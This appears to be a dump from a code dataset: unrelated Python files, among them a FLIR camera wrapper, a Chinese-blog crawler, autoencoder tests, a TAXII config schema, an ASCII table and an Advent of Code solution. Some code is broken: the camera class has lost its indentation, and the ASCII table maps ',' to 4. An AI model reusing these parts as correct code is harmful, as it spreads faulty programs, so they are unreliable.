assert str(solve_phi(x=0.95)) == str(phi(0.95))
assert str(solve_phi(phi_value=0.8315))[:5] == "0.960"
assert str(phi_inverse(0.205))[:5] == "-0.82"
assert str(phi_inverse(0.999))[:5] == "3.090"
assert str(phi_inverse(0.9999))[:5] == "3.719"
assert str(solve_phi_inverse(p=0.404)) == str(phi_inverse(0.404))
assert str(solve_phi_inverse(phi_inverse_value=solve_phi_inverse(p=0.404)))[:5] == "0.404"
assert str(t(23, 0.9))[:5] == "1.319"
assert str(t(130, 0.9))[:5] == "1.288"
assert str(t(130, 0.1))[:15] == str(-t(130, 0.9))[:15]
assert str(solve_t(t_value=2.086, f=20))[:5] == "0.975"
assert str(chi_squared(10, 0.2))[:5] == "6.179"
assert solve_chi_squared(chi_squared_value=None, f=10, p=0.2) == chi_squared(10, 0.2)
assert str(solve_chi_squared(chi_squared_value=11.1, f=13, p=None))[:5] == "0.397"
assert str(f(500, 10, 0.9))[:4] == "2.06"
assert str(f(500, 500, 0.5))[:4] == "1.00"
assert str(solve_f(1.11,60, 6))[:4] == "0.50"
print("All unit tests passed")
#fractile_diagram_table([6.3,7.1,7.4,6.8,7.1,7.8,6.9,7.3,7.7,7.3])
unit_test()
print("Successfully set up")
print("For all methods called 'solve_x(param1=None, param2=None, ...)' you need to supply all but one parameter to solve for the None parameter")
print("\n\n")
print("--- Fractile diagrams ---")
print("\tUse 'fractile_diagram_table(data)' to generate the table on p.31 (data is a list of observations)")
PrintLatex("$\Phi$")
print("---Phi lookups: page 1 in ST ---")
print("\t'phi(x)'")
print("\t'solve_phi(phi_value=None, x=None)'")
PrintLatex("$\Phi^{-1}$")
print("--- Phi^-1 lookups: page 2-4 in ST ---")
print("\tUse 'phi_inverse(p)' (remember that p < 1)")
print("\tUse 'solve_phi_inverse(phi_inverse_value=None, p=None)'")
PrintLatex("$t_p(f)$")
print("--- t lookups: page 5 in ST ---")
print("\tUse 't(f, p)'")
print("\tUse 'solve_t(t_value=None, f=None, p=None)'")
PrintLatex("$\chi^2_p(f)$")
print("--- chi^2 lookups: page 6-9 in ST ---")
print("\tUse 'chi_squared(f, p)'")
print("\tUse 'solve_chi_squared(chi_squared_value=None, f=None, p=None)'")
PrintLatex("$F_p(f_1, f_2)$")
print("--- F lookups: page 14-49 in ST ---")
print("\tUse 'f(f1, f2, p)'")
print("\tUse 'solve_f(f_value=None, f1=None, f2=None, p=None)'") |
987,187 | 519115df9f1f69248079d9f3c08a47c54bc3070c | # # Python Class for FLIR Systems' Blackfly USB Camera
#
# By Chris Arcadia (2021/01/11)
#
# Intended for use with the Blackfly S USB3 Camera
#
# Inspired by the following Repositories:
# * "Acquisition.py" (from "Spinnaker-Python3-Examples" by FLIR Systems, in Python, in [firmware download](https://flir.custhelp.com/app/account/fl_downloads))
# * "Enumeration.py" (from "Spinnaker-Python3-Examples" by FLIR Systems, in Python, in [firmware download](https://flir.custhelp.com/app/account/fl_downloads))
import time
import numpy
import os
import PySpin
from matplotlib import pyplot
class BlackFlyPy():
def __init__(self):
self.load_options()
self.load_constants()
self.set_path()
self.initialize_system()
self.load_system_info()
def load_options(self):
self.verbose = True
self.record = True # unimplemented option to save each read step or position value to text (along with a timestamp)
def load_constants(self):
# load constants specific to Blackfly
self.hardware = {
'interface':'USB 3',
'manufacturer': 'FLIR Systems',
'camera':'Blackfly S',
} # known hardware details
self.units = {
'time': 's',
}
def set_path(self,pathOut=None):
self.path = dict();
self.path['root'] = os.path.dirname(__file__)
if not pathOut:
# provide default output path
pathOut = os.path.join(self.path['root'],'__temporary__')
self.ensure_path(pathOut)
self.path['output'] = pathOut
def ensure_path(self,path):
if not os.path.isdir(path):
os.mkdir(path)
def notify(self,message):
if self.verbose:
print('BlackFlyPy: '+message)
def initialize_system(self):
self.get_system()
self.get_interfaces()
self.get_cameras()
def get_system(self):
try:
self.system = PySpin.System.GetInstance()
self.loaded = True
self.notify('System initialized with library version '+self.get_library_version())
except:
self.system = None
self.loaded = False
def get_library_version(self):
version = None
if self.loaded:
version = self.system.GetLibraryVersion()
version = '%d.%d.%d.%d' % (version.major, version.minor, version.type, version.build)
return version
def get_interfaces(self):
self.interfaces = None
if self.loaded:
try:
self.interfaces = self.system.GetInterfaces()
self.notify('Found %i interfaces.' % self.about_interfaces()['count'])
except:
pass
return self.interfaces
def about_interfaces(self):
info = {'count':0,'name':[],'index':[]}
if self.loaded and self.interfaces:
info['count'] = self.interfaces.GetSize()
info['index'] = list(range(info['count']))
for interface in self.interfaces:
nodemap = interface.GetTLNodeMap()
name = self.get_nodemap_property(nodemap,'InterfaceDisplayName')
info['name'].append(name)
return info
def clear_interfaces(self):
if self.loaded and self.interfaces:
self.interfaces.Clear()
def get_nodemap_property(self,nodemap,field):
value = None
try:
ptr = PySpin.CStringPtr(nodemap.GetNode(field))
if PySpin.IsAvailable(ptr) and PySpin.IsReadable(ptr):
value = ptr.GetValue()
except:
pass
return value
def get_cameras(self):
self.cameras = None
if self.loaded:
try:
self.cameras = self.system.GetCameras()
self.notify('Detected %i cameras.' % self.about_cameras()['count'])
except:
pass
return self.cameras
def about_cameras(self):
info = {'count':0,'name':[],'index':[],'vendor':[]}
if self.loaded and self.cameras:
info['count'] = self.cameras.GetSize()
info['index'] = list(range(info['count']))
for camera in self.cameras:
nodemap = camera.GetTLDeviceNodeMap()
vendor = self.get_nodemap_property(nodemap,'DeviceVendorName')
model = self.get_nodemap_property(nodemap,'DeviceModelName')
info['name'].append(model)
info['vendor'].append(vendor)
return info
def clear_cameras(self):
if self.loaded and self.cameras:
self.cameras.Clear()
def get_system_info(self):
info = dict()
info['libraryVersion'] = self.get_library_version()
info['interfaces'] = self.about_interfaces()
info['cameras'] = self.about_cameras()
return info
def load_system_info(self):
self.info = self.get_system_info()
def release(self):
if self.loaded:
self.clear_cameras()
self.clear_interfaces()
self.system.ReleaseInstance()
def initialize_camera(self,index=0):
if self.loaded and self.cameras and index<self.about_cameras()['count']:
try:
camera = self.cameras[index]
camera.Init()
except:
pass
def deinitialize_camera(self,index=0):
if self.loaded and self.cameras and index<self.about_cameras()['count']:
try:
camera = self.cameras[index]
camera.DeInit()
except:
pass
def get_camera_information(self,index=0):
info = dict()
if self.loaded and self.cameras and index<self.about_cameras()['count']:
try:
camera = self.cameras[index]
nodemap = camera.GetTLDeviceNodeMap()
info_ptr = PySpin.CCategoryPtr(nodemap.GetNode('DeviceInformation'))
if PySpin.IsAvailable(info_ptr) and PySpin.IsReadable(info_ptr):
features = info_ptr.GetFeatures()
for feature in features:
ptr = PySpin.CValuePtr(feature)
if PySpin.IsReadable(ptr):
field = ptr.GetName()
value = ptr.ToString()
info.update({field:value})
except:
pass
return info
def get_camera_image(self,index=0,timeout=1): # timeout specified in seconds
info = dict()
data = None
if self.loaded and self.cameras and index<self.about_cameras()['count']:
try:
camera = self.cameras[index]
nodemap = camera.GetTLDeviceNodeMap()
serial = self.get_nodemap_property(nodemap,'DeviceSerialNumber')
filename = 'Image-'+str(serial)+'-'+'.jpg'
fullfilename = os.path.join(self.path['output'],filename)
self.notify('Starting image acquisition.')
camera.BeginAcquisition()
try:
image = camera.GetNextImage(round(timeout*1e3))
if image.IsIncomplete():
self.notify('Image incomplete with image status %d ...' % image.GetImageStatus())
else:
info = {'width':image.GetWidth(),
'height':image.GetHeight(),
'timestamp':image.GetTimeStamp(), # time stamp is in nanoseconds
}
data = image.GetNDArray()
image_converted = image.Convert(PySpin.PixelFormat_Mono8, PySpin.HQ_LINEAR)
image_converted.Save(fullfilename)
self.notify('Image captured with the following details: \n' + str(info))
image.Release()
except:
pass
self.notify('Ending image acquisition.')
camera.EndAcquisition()
except:
pass
return [data,info]
if __name__ == "__main__":
# set camera ID to the first available camera
cid = 0
# instantiate class
blackfly = BlackFlyPy()
# get device info
info = blackfly.get_camera_information(index=cid)
print('Selected Device Info: \n'+str(info))
# aquire images
blackfly.initialize_camera(index=cid)
result = blackfly.get_camera_image(index=cid)
if result[0]:
pyplot.imshow(result[0],cmap='gray')
blackfly.deinitialize_camera(index=cid)
# todo:
# - set image acuired exposure and gain
# - clean-up get_camera_image method
# - append desired image metadata to image or associated text file
# -*- coding: utf-8 -*-
|
987,188 | 7873c5e657f3e904989d557706f9aad6da6485e6 | from django.urls import include, path
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'api', views.pcViewSet)
urlpatterns = [
path('', views.index, name='index'),
path('', include(router.urls)),
]
|
987,189 | 7b0f0198875b3281f804c15fcfb7be1be26eaa01 | import os
import requests
import re
from dataclasses import dataclass
from urllib.parse import urljoin
from urllib.parse import urlparse
from requests_html import AsyncHTMLSession
# from requests_html import HTMLSession
from utils import PASS_DOMAIN, geuss_link_url, rm_slash, has_url_html_been_fetched
from itertools import chain
from schema import SiteInfoItem
from is_site_a_zh_i9t_blog import test
asession = AsyncHTMLSession()
adapter = requests.adapters.HTTPAdapter(pool_connections=100, pool_maxsize=100)
asession.mount('http://', adapter)
asession.mount('https://', adapter)
re_zh_text = zh_re = re.compile('[\u4e00-\u9fa5]')
re_archive_zh = re.compile('归档')
re_archive_en = re.compile('archive')
re_tag_zh = re.compile('标签')
re_tag_en = re.compile('tag')
re_cate_zh = re.compile('分类')
re_cate_en = re.compile('categor')
re_about_zh = re.compile('关于')
re_about_en = re.compile('about')
re_theme_en = re.compile('theme')
re_blog_text_zh = re.compile('博客')
re_blog_text_en = re.compile('blog')
re_map = {
"has_archive": [re_archive_en, re_about_zh],
"has_tag": [re_tag_en, re_about_zh],
"has_category": [re_cate_en, re_cate_zh],
"has_about": [re_about_zh, re_about_en],
"has_theme": [re_theme_en],
"has_zh_text": [re_zh_text],
"has_blog_text": [re_blog_text_en, re_blog_text_zh]
}
# 标题中出现这些关键词时,基本上不会是个人博客
BLACK_WORDS = set({
"SEO", "官方", "导航", "网址"
})
class SiteFeatureTransformer:
def __init__(self, url, r, friends):
self.text = r.html.text
self.r = r
self.url = url
self.friends = friends
@property
def domain(self):
return urlparse(self.url).netloc
@property
def tld(self):
return self.domain.split(".")[-1]
@property
def sld(self):
return self.domain.split(".")[-2]
@property
def name(self):
title = self.r.html.find('title', first=True)
if title:
return title.text
else:
return 'unknown'
@property
def rss(self):
pass
return ""
@property
def generator(self):
find_in_meta = self.r.html.find("meta[name='generator']", first=True)
if find_in_meta:
return find_in_meta.attrs.get('content', 'unknown')
find_in_html_text = self.r.html.search("Powered by{}<a{}>{}</a>")
if find_in_html_text:
return find_in_html_text[2]
else:
return 'unknown'
@property
def feature(self):
feature_has = {k: any([re_item.search(self.text)
for re_item in res]) for k, res in re_map.items()}
feature_has["has_generator"] = bool(self.generator != 'unknown')
feature_has["has_rss"] = bool(self.rss)
feature = {
"len_friends": len(self.friends),
# "tld": self.tld,
# "sld": self.sld,
}
return {**feature_has, **feature}
def to_data(self):
feature = self.feature
data = {
"domain": self.domain,
"name": self.name,
"rss": self.rss,
"generator": self.generator,
"friends": self.friends,
"url": self.url,
"tld": self.tld,
"sld": self.sld
}
return {**feature, **data}
def save_html(domain, html):
path = os.path.join('html', f'{domain}.html')
with open(path, 'w') as f:
f.write(html)
def get_data(urls):
res = get_frineds_and_res(urls)
data = []
for url, friends, r in res:
site_feature = SiteFeatureTransformer(r=r, url=url, friends=friends)
if site_feature.feature['has_zh_text'] and test(site_feature.feature) :
site = SiteInfoItem(**site_feature.to_data())
save_html(site.domain, str(r.html.html))
data.append(site)
else:
print('{} maybe not personal zh blog'.format(url))
return data
def get_url_html(url):
async def f():
# print("get:{}".format(url))
try:
r = await asession.get(url, timeout=10)
return r
except requests.exceptions.ConnectTimeout:
# print("{} 链接超时,不可访问".format(url))
pass
except:
pass
# print("{} 链接错误,不可访问".format(url))
return f
def get_frineds_and_res(urls):
"""
找到给定 url 的友情链接列表,返回友链 & 友链页面 html
"""
urls = [url for url in urls if not has_url_html_been_fetched(url)]
all_urls = list(chain(*[geuss_link_url(url) for url in urls]))
res = []
try:
results = asession.run(*[get_url_html(url)
for url in all_urls])
for url in urls:
friends = []
index_rhtml = None
for r in results:
if r:
if friends and index_rhtml:
break
elif r.status_code == 200 and urlparse(r.url).netloc == urlparse(url).netloc:
if not friends:
pass_domain = PASS_DOMAIN + \
[urlparse(r.url).netloc]
friends = list(
map(lambda url: rm_slash(url), r.html.absolute_links))
friends = list(filter(lambda url: all([url.find(
pdomain) == -1 for pdomain in pass_domain]) & (urlparse(url).path == ""), set(friends)))
if not index_rhtml and rm_slash(r.url) == url:
index_rhtml = r
else:
pass
if friends and index_rhtml:
res.append((url, friends, index_rhtml))
except Exception as e:
print(e)
finally:
return res
if __name__ == "__main__":
urls = ["https://www.magicican.com",
"https://elfgzp.cn",
"https://ruterly.com",
"https://www.tsuna.moe"]
data = {
"has_archive": 0,
"has_tag": 1,
"has_category": 0,
"has_about": 1,
"has_theme": 1,
"has_zh_text": 1,
"has_blog_text": 1,
"has_generator": 1,
"has_rss": 1,
"len_friends": 1
# "tld": "com",
# "sld": "1a23"
}
print(test(data))
# get_data(urls)
|
987,190 | 2d246bff36484239bc035b33d997bef115cdde4a | # -*- coding: utf-8 -*-
import numpy as np
from breze.learn import autoencoder
from breze.learn.utils import theano_floatx
def test_autoencoder():
X = np.random.random((10, 10))
X, = theano_floatx(X)
m = autoencoder.AutoEncoder(10, [100], ['tanh'], 'identity', 'squared',
tied_weights=True, max_iter=10)
m.fit(X)
m.score(X)
m.transform(X)
def test_deepautoencoder():
X = np.random.random((10, 10))
X, = theano_floatx(X)
m = autoencoder.AutoEncoder(10, [100, 10, 100],
['tanh', 'identity', 'tanh'], 'identity',
'squared',
tied_weights=False, max_iter=10)
m.fit(X)
m.score(X)
m.transform(X)
def test_sparse_autoencoder():
X = np.random.random((10, 10))
X, = theano_floatx(X)
m = autoencoder.SparseAutoEncoder(
10, [100], ['sigmoid'], 'identity', 'squared', tied_weights=True,
optimizer='rprop',
sparsity_target=0.01, c_sparsity=3., sparsity_loss='bern_bern_kl',
max_iter=10)
m.fit(X)
m.score(X)
m.transform(X)
def test_contractive_autoencoder():
X = np.random.random((10, 10))
X, = theano_floatx(X)
m = autoencoder.ContractiveAutoEncoder(
10, [100], ['sigmoid'], 'identity', 'squared', tied_weights=True,
c_jacobian=3, max_iter=10)
m.fit(X)
m.score(X)
m.transform(X)
def test_denoising_autoencoder():
X = np.random.random((10, 10))
X, = theano_floatx(X)
m = autoencoder.DenoisingAutoEncoder(
10, [100], ['sigmoid'], 'identity', 'squared', tied_weights=True,
noise_type='gauss', c_noise=.3, max_iter=10)
m.fit(X)
m.score(X)
m.transform(X)
|
987,191 | 07b398dc7c3aebd738d3cb8ca28390c1c2d0cbaa | # coding: utf-8
# Copyright © 2014-2020 VMware, Inc. All Rights Reserved.
################################################################################
# noinspection PyUnresolvedReferences
import os
import re
from enum import Enum
from taxii2client.common import TokenAuth
from taxii2client.v20 import Server as ServerV20
from taxii2client.v21 import Server as ServerV21
from cbopensource.utilities.common_config import BoolConfigOption, CertConfigOption, CommaDelimitedListConfigOption, \
CommonConfigBase, CommonConfigException, CommonConfigOptionBase, IntConfigOption, PairedConfigOption, \
StringConfigOption
__all__ = ["TaxiiURLConfigOption", "ServerVersion", "ServerVersionConfigOption",
"TaxiiServerConfiguration"]
class TaxiiURLConfigOption(CommonConfigOptionBase):
@staticmethod
def taxii_url_checker(value):
matched = re.search(r"https?://\S+(:\d{1,5})?", value)
if matched is None:
raise CommonConfigException(f"Server url must match required format http(s)://<server>[:port]/taxii2")
def __init__(self):
super().__init__('url', str, bounds_checker=self.taxii_url_checker)
class ServerVersion(Enum):
V21 = 1
V20 = 0
@staticmethod
def get_server_for_version(version):
if version == ServerVersion.V20:
return ServerV20
else:
return ServerV21
@staticmethod
def from_string(str_version):
return ServerVersion[str_version.upper()]
@staticmethod
def check_string_version(str_version):
if not str_version.upper() in ["V20", "V21"]:
raise CommonConfigException(f"Version '{str_version.upper()}' "
f"not supported, supported versions are V21 and V20")
class ServerVersionConfigOption(CommonConfigOptionBase):
def __init__(self):
super().__init__('version', str, bounds_checker=ServerVersion.check_string_version, required=False,
transform=ServerVersion.from_string, allowed_values=[ServerVersion.V20, ServerVersion.V21])
class TaxiiServerConfiguration(CommonConfigBase):
"""
The class handles the configuration of a single TAXII connection stanza.
"""
DEFAULT_SCORE = 75
DEFAULT_PAGINATION = 100
PAGINATION_LOW_BOUNDS = 10
PAGINATION_HIGH_BOUNDS = 1000
# Schema definitions
config_schema = {
"cert": CertConfigOption(),
"collections": CommaDelimitedListConfigOption('collections', unique=True, required=False, default=None,
sort_list=False),
"ioc_types": CommaDelimitedListConfigOption('ioc_types', unique=True, required=False, default=None,
accepted_values=['hash', 'address', 'domain'], max_len=3),
"pagination": IntConfigOption('pagination', min_value=PAGINATION_LOW_BOUNDS, max_value=PAGINATION_HIGH_BOUNDS,
required=False, default=100),
"password": PairedConfigOption(StringConfigOption('password', required=False), 'username'),
"score": IntConfigOption('score', min_value=1, max_value=100, default=DEFAULT_SCORE),
"token": StringConfigOption("token", required=False, max_len=156, transform=TokenAuth),
"url": TaxiiURLConfigOption(),
"user": PairedConfigOption(StringConfigOption('username', required=False), 'password'),
"verify": BoolConfigOption('verify', required=False, default=None),
"version": ServerVersionConfigOption(),
}
|
987,192 | 16b401849607d7694a277e3d461e28001675c37c |
from collections import Counter
def almost_uniform(nums):
cnt = Counter(nums)
cnt2 = cnt.copy()
for x in cnt:
cnt2[x] += cnt[x-1]
return max([0]+[cnt2[x] for x in cnt if x-1 in cnt])
|
987,193 | 176e684e1e4515a00a1a8f88ca7d5f37d2c5b6b7 | import glob
import os
import typing
import importlib.util
import models.cards
import models.decks
import models.players
RESOURCES_DIR = 'resources'
CARDS_DIR = f'{RESOURCES_DIR}/cards'
DECKS_DIR = f'{RESOURCES_DIR}/decks'
def get_card(card_id: str, player_number: models.players.PlayerNumber) -> models.cards.BaseCard:
card: models.cards.BaseCard = _get_resource(card_id, CARDS_DIR, models.cards.BaseCard)
card.player = player_number
return card
def get_master_deck(deck_id: str) -> models.decks.MasterDeck:
master_deck = _get_resource(deck_id, DECKS_DIR, models.decks.MasterDeck)
return master_deck
ResourceType = typing.TypeVar('ResourceType')
def _get_resource(resource_id: str, base_dir: str, resource_type: typing.Type[ResourceType]) -> ResourceType:
_set_wd()
file_names = glob.glob(f'{base_dir}/**/{resource_id}.py', recursive=True)
if not file_names:
raise FileNotFoundError(f'No file matching {resource_id}.py in {base_dir}')
if len(file_names) > 1:
raise FileExistsError(f'Multiple files matching {resource_id} in {base_dir}: {file_names}')
file_name = file_names[0]
spec = importlib.util.spec_from_file_location("module.name", file_name)
resource_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(resource_module)
try:
resource = resource_module.resource
return resource
except ValueError: # todo fix error type
raise ValueError(f'Resource file {file_name} does not create a resource attribute.')
def _set_wd():
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
|
987,194 | a0be253ece64834eb814019324ecb84e12993ab4 | from django.db import models
from django.contrib import admin
class MenuList(models.Model):
menu_item = models.CharField('Menu Item', max_length = 30)
price = models.FloatField()
available = models.BooleanField(default=False)
def __unicode__(self):
return self.menu_item
class Order(models.Model):
order_item = models.ForeignKey('MenuList', null=False)
quantity = models.IntegerField(default=1)
paid_for = models.BooleanField('Paid for')
delivery = models.BooleanField('Do you want your food delivered to you? (50p)', default=False)
delivery_cost = models.FloatField(default=.50)
block = models.CharField('Block', blank=True, max_length = 30)
room_num = models.IntegerField('Room number', blank=True)
other_location = models.CharField('Other location', blank=True, max_length = 30)
tel_num = models.IntegerField('Telephone', blank=True, null=True)
order_details = models.TextField('Order details')
created = models.DateTimeField('Date and time', auto_now_add=True)
total_amount = models.FloatField(blank=True, null=True)
def __unicode__(self):
return str(self.order_item)
admin.site.register(MenuList)
admin.site.register(Order)
|
987,195 | fdfdf23239241507857e5e210b92f00d657c826e | # Table of ASCII characters
ascii_chars = {
0:"NUL",
1:"SOH",
2:"STX",
3:"ETX",
4:"EOT",
5:"ENQ",
6:"ACK",
7:"BEL",
8:"BS",
9:"HT",
10:"LF",
11:"VT",
12:"FF",
13:"CR",
14:"SO",
15:"SI",
16:"DLE",
17:"DC1",
18:"DC2",
19:"DC3",
20:"DC4",
21:"NAK",
22:"SYN",
23:"ETB",
24:"CAN",
25:"EM",
26:"SUB",
27:"ESC",
28:"FS",
29:"GS",
30:"RS",
31:"US",
32:"space",
33:"!",
34:"\"",
35:"#",
36:"$",
37:"%",
38:"&",
39:"'",
40:"(",
41:")",
42:"*",
43:"+",
44:",",
45:"-",
46:".",
47:"/",
48:"0",
49:"1",
50:"2",
51:"3",
52:"4",
53:"5",
54:"6",
55:"7",
56:"8",
57:"9",
58:":",
59:";",
60:"<",
61:"=",
62:">",
63:"?",
64:"@",
65:"A",
66:"B",
67:"C",
68:"D",
69:"E",
70:"F",
71:"G",
72:"H",
73:"I",
74:"J",
75:"K",
76:"L",
77:"M",
78:"N",
79:"O",
80:"P",
81:"Q",
82:"R",
83:"S",
84:"T",
85:"U",
86:"V",
87:"W",
88:"X",
89:"Y",
90:"Z",
91:"[",
92:"\\",
93:"]",
94:"^",
95:"_",
96:"`",
97:"a",
98:"b",
99:"c",
100:"d",
101:"e",
102:"f",
103:"g",
104:"h",
105:"i",
106:"j",
107:"k",
108:"l",
109:"m",
110:"n",
111:"o",
112:"p",
113:"q",
114:"r",
115:"s",
116:"t",
117:"u",
118:"v",
119:"w",
120:"x",
121:"y",
122:"z",
123:"{",
124:"|",
125:"}",
126:"~",
127:"DEL",
}
text_ascii = {
"NUL":0,
"SOH":1,
"STX":2,
"ETX":3,
"EOT":4,
"ENQ":5,
"ACK":6,
"BEL":7,
"BS":8,
"HT":9,
"LF":10,
"VT":11,
"FF":12,
"CR":13,
"SO":14,
"SI":15,
"DLE":16,
"DC1":17,
"DC2":18,
"DC3":19,
"DC4":20,
"NAK":21,
"SYN":22,
"ETB":23,
"CAN":24,
"EM":25,
"SUB":26,
"ESC":27,
"FS":28,
"GS":29,
"RS":30,
"US":31,
"space":32,
"!":33,
"\"":34,
"#":35,
"$":36,
"%":37,
"&":38,
"'":39,
"(":40,
")":41,
"*":42,
"+":43,
",":4,
"-":45,
".":46,
"/":47,
"0":48,
"1":49,
"2":50,
"3":51,
"4":52,
"5":53,
"6":54,
"7":55,
"8":56,
"9":57,
":":58,
";":59,
"<":60,
"=":61,
">":62,
"?":63,
"@":64,
"A":65,
"B":66,
"C":67,
"D":68,
"E":69,
"F":70,
"G":71,
"H":72,
"I":73,
"J":74,
"K":75,
"L":76,
"M":77,
"N":78,
"O":79,
"P":80,
"Q":81,
"R":82,
"S":83,
"T":84,
"U":85,
"V":86,
"W":87,
"X":88,
"Y":89,
"Z":90,
"[":91,
"\\":92,
"]":93,
"^":94,
"_":95,
"`":96,
"a":97,
"b":98,
"c":99,
"d":100,
"e":101,
"f":102,
"g":103,
"h":104,
"i":105,
"j":106,
"k":107,
"l":108,
"m":109,
"n":110,
"o":111,
"p":112,
"q":113,
"r":114,
"s":115,
"t":116,
"u":117,
"v":118,
"w":119,
"x":120,
"y":121,
"z":122,
"{":123,
"|":124,
"}":125,
"~":126,
"DEL":127,
}
def ascii_converter(number):
return(ascii_chars[number])
def big_input(big):
big = str(big).split()
new_text = ""
for num in big:
num = int(num)
try:
new = ascii_converter(num)
except:
new = str(num)
if new == "space":
new_text += " "
else:
new_text += new
return new_text
def text_to_ascii(t):
l = ""
for word in str(t):
for letter in word:
if letter == " ":
letter = "space"
l += str(text_ascii[letter])
l += " "
return l |
987,196 | 8c88dcbc5481a98d9519a183fe9c8cd02f1b0660 | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
##
# Advent of code 2019, AoC day 16 puzzle 1
# This solution (python3.7 jupyter notebook) by kannix68, @ 2020-01-06.
import sys
sys.path.insert(0, '..') # allow import from parent dir
from typing import Dict, List, Tuple
import lib.aochelper as aoc
from lib.aochelper import map_e
# In[ ]:
import logging
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
log = logging.getLogger(__name__)
# In[ ]:
## PROBLEM DOMAIN code
import itertools
from timeit import default_timer as timer # performance timing measurement
# In[ ]:
def phase_transform(ins: str, ptrn: List[int], num_phases = 1) -> str:
tmp = ins
for iter in range(num_phases):
if iter > 0:
tmp = outs
outdigs = []
for digidx in range(len(ins)):
digptrn = []
for i in ptrn:
for fac in range(digidx+1):
digptrn.append(i)
#log.debug(f"digid={digidx}, digptrn={digptrn}")
outdig_compositor = []
offset = 1 # number of elements to consume from (cycled) pattern before acting on input
for idx, val in enumerate(itertools.cycle(digptrn), -offset):
if idx == len(tmp):
break
if idx < 0:
continue
#log.debug(f" {idx}, ins-dig={ins[idx]} ptrn:{val}")
outdig_compositor.append( int(tmp[idx])*val )
dig = abs(sum(outdig_compositor))%10
outdigs.append(dig)
outs = ''.join(map_e(str, outdigs))
#log.debug(f"phase_transform #{iter+1}: outdigs={outs} via {len(ins)} iters from ptrn={aoc.cl(ptrn)}, input#={tmp}")
log.info(f"phase_transform iter={iter+1} out={outs} via {len(ins)} iters from ptrn={aoc.cl(ptrn)}, input0={ins[:40]}...")
return outs
# In[ ]:
## MAIN
# In[ ]:
### tests
# In[ ]:
## example 0-a from text
ins = "9, 8, 7, 6, 5"
ins = map_e(int, ins.split(', '))
ptrn = "1, 2, 3"
ptrn = map_e(int, ptrn.split(', '))
res = phase_transform(ins, ptrn)
log.info(f"result={res}")
#result = solve(ins)
#expected = 31
#aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
## example 1
ins = "12345678"
ptrn = [0, 1, 0, -1]
res = phase_transform(ins, ptrn)
log.info(f"result iter#1={res}")
res = phase_transform(res, ptrn)
log.info(f"result iter#1={res}")
result = phase_transform(ins, ptrn, num_phases=4)
expected = "01029498"
aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
# example 2
ins = "80871224585914546619083218645595"
ptrn = [0, 1, 0, -1]
result = phase_transform(ins, ptrn, num_phases=100)
result = result[:8]
expected = "24176176"
aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
# example 3
ins = "19617804207202209144916044189917"
ptrn = [0, 1, 0, -1]
result = phase_transform(ins, ptrn, num_phases=100)
result = result[:8]
expected = "73745418"
aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
# example 4
ins = "69317163492948606335995924319873"
ptrn = [0, 1, 0, -1]
result = phase_transform(ins, ptrn, num_phases=100)
result = result[:8]
expected = "52432133"
aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
### personal input solution
# In[ ]:
log.setLevel(logging.INFO)
data = aoc.read_file_to_str("day16.in").strip()
ptrn = [0, 1, 0, -1]
log.info(f"data-len={len(data)}, data={data[:40]}...")
tm_start = timer()
result = phase_transform(data, ptrn, num_phases=100)
tm_end = timer()
result = result[:8]
print(f"result={result} needed tm={tm_end-tm_start}")
|
987,197 | c5de715f77761720297f0fd8c470aa7cec92b2ce | """
Here we test things from the Nexa package
"""
import unittest
import numpy as np
import numpy.testing as nptest
from unittest import TestCase
import sys
sys.path.append('./')
import nexa.aux_functions as aux_functions
##################
# Test auxiliar functions
##################
class TestAuxiliaryFunctions(TestCase):
"""
This is for the testing all the class in
auxiliary functions
"""
def test_normalization(self):
"""
Test that value is normalized for 1
"""
Number_of_tests = 1000
low = -1000
high = 1000
for i in range(Number_of_tests):
x = np.random.rand(100) * (high - low) + low
y = aux_functions.softmax_base(x)
result = np.sum(y)
nptest.assert_almost_equal(result, 1.0)
def test_finite(self):
"""
This tests that the tests produces a non-inifite
non nan value.
"""
Number_of_tests = 1000
low = -1000
high = 1000
for i in range(Number_of_tests):
x = np.random.rand(100) * (high - low) + low
y = aux_functions.softmax_base(x)
# This should be True if all are finite
all_finite = np.isfinite(y).all()
self.assertTrue(all_finite)
if __name__ == '__main__':
unittest.main()
|
987,198 | 9f3b8103c1572d1f63552b5e8f519609416e144d | import unittest
from capstone.player import RandPlayer
class TestRandPlayer(unittest.TestCase):
def setUp(self):
self.rand_player = RandPlayer()
def test_has_name(self):
self.assertEqual(RandPlayer.name, "RandPlayer")
self.assertEqual(self.rand_player.name, "RandPlayer")
|
987,199 | a9ff2453871c7704f3ad743bf86e306157c786e9 |
# 字符串(String)
word = '字符串'
sentence = "这是一个句子。"
paragraph = """这是一个段落,
可以由多行组成"""
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.